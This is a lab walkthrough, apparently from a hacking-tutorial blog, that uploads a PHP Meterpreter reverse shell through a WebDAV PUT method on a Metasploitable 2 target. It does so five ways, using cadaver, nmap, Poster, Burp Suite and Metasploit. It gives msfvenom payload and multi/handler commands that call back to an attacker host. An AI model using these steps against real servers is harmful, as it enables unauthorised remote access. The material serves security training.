5 ways to Exploiting PUT Vulnerability in Webserver

Today’s article is related to bypass PUT method vulnerability through various techniques. From previous article we came across to different actions performed by HTTP methods where I had described the role of PUT method which allow client to upload a file on server. Now I will take advantage of this method for uploading a malicious file and make server compromise.

Target: Metasploitable 2

Attacker: Kali Linux

Let’s Begin!!!!

 Boot up your kali Linux and Open Firefox Type victim IP: 192.168.1.4 in url and click on WEBDAV. Here you can see it is showing only parent directory.  Now turn on terminal for executing the following commands through it.

First of all make sure the PUT method must be allowed by HTTP on server, for confirming this we need to scan the target using nikto.

Nikto –hhttp://192.168.1.4/dav

 The highlighted part showing PUT method is allowed. Now it is time to hack the server by uploading PHP malicious file using following techniques.

Prepare the malicious file that you would upload with msfvenom :

msfvenom -p php/meterpreter/reverse_tcplhost=192.168.1.5 lport=4444 -f raw. Copy the code from <?php to die() and save it in a file with .php extension. I have saved the backdoor as shell.php on desktop and will later browser this file to upload on web server.

Now load metasploit framework by typing msfconsole on a new terminal and start multi/handler

CADAVER

Cadaver is installed in kali which is command line tool that support uploading and downloading of a file on webdav.

Type host URL where you want to upload your file using first command given below.

Cadaver http://192.168.1.4/dav/

 Now you are inside victim’s directory. Upload the shell.php here by executing below command and these two commands will let you upload your file on target machine.

put /root/Desktop/shell.php

To verify that file is uploaded or not, make URL: 192.168.1.4/dav run on browser. Congrats!!!Wehave got our file shell.php on web server.

Simultaneously, open metasploit and use multi/handler. When it is ready to exploit  go back to uploaded shell.php file and click on it.

 msf> use multi/handler

msf exploit(handler) > set lport 4444

msf exploit(handler) > set lhost 192.168.1.5

msf exploit(handler) > set payload php/meterpreter/reverse_tcp

msf exploit(handler) > exploit

meterpreter>sysinfo

 It will give you a meterpreter session.

NMAP

 Uploads a local file to a remote web server using the HTTP PUT method.You must specify the filename and URL path with NSE arguments.Prepare the malicious file nmap.php that you want to upload.

nmap -p 80 192.168.1.4 –script http-put –script-args http-put.url=’/dav/nmap.php’,http-put.file=’/root/Desktop/nmap.php’

  It is disclosed in its result that nmap.php is uploaded successfully now let’s check it.

Again types same URL in browser 192.168.1.4/dav and make it run. Yes we have got our file nmap.php on web server.

Simultaneously, open metasploit and use multi/handler; then go back to uploaded nmap.php file and run it.

It will also give youa meterpreter session.

POSTER

Install poster plug-in from Firefox add-on. As poster let you perform HTTP request with parameters like: GET, POST, PUT and DELETE. Prepare the malicious file poster.php that you would upload. Click on the tools from the menu bar. And then click on Poster from the drop down menu. A following dialog box will open. Here, type URL as mention in screenshot   browse the file that you will upload and click on PUT option. This exploring will show you that PUT method is allowed that means you can upload through it.

Give URL in browser 192.168.1.4/dav make it run.  We got our file poster.php on web server.

All together, run multi/handler; then go back to uploaded poster.php file and click on it.A meterpreter session will get open again.

BURP SUITE

Turn up burp suite and don’t forget to set manual proxy of your browser. Now open proxy tab and hit interceptis on button to capture the request of target. When this is done you will get fetched data under intercept window.

Now right click on its window and a list of options will appear. Further click on send to repeater.

Look over screenshot here you will find two panel left and right for request and response respectively

The GET method is present in header of request and we need PUT method to upload file. Here I am going to replace this method with PUT. Prepare the malicious file burp.php that you need to upload.

Type PUT /dav/burp.php HTTP/1.1 in header it’ll upload the burp.php file under dav directory through PUT request. Then paste php malicious code <?php to die() after cache control. Please follow the screenshot respectively.

Repeat same URL in browser 192.168.1.4/dav and make it run. Again we have got our burp.php file on web server.

Now repeat same process for meterpreter session in metasploit and we got the victim sessions again.

METASPLOIT

 This module can abuse misconfigured web servers to upload and delete web content via PUT and DELETE HTTP requests. Set ACTION to either PUT or DELETE. PUT is the default. If filename isn’t specified, the module will generate a random string for you as a .txt file. If DELETE is used, a filename is required.

Use msf>auxiliary/scanner/http/http_put

Msf>auxiliary (http_put) > set rhosts 192.168.1.4

Msf>auxiliary (http_put) > set payload php/meterpreter/reverse_tcp

Msf>auxiliary (http_put) > set path /dav/

Msf>auxiliary (http_put) > set filename meta.php

Msf>auxiliary (http_put) > set filedata file://root/Desktop/meta.php

Msf>auxiliary (http_put) > exploit

Although it is showing 192.168.1.4 does not exist and error in uploading. However, the Index of/dav – Mozilla Firefox clearly shows meta.php is uploaded.  

Run same URL in browser 192.168.1.4/dav. Last but not the least, again we have got our file meta.php on web server which means message “the upload probably failed” by metasploit is not true.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

 

Related Posts Plugin for WordPress, Blogger...

Leave a Reply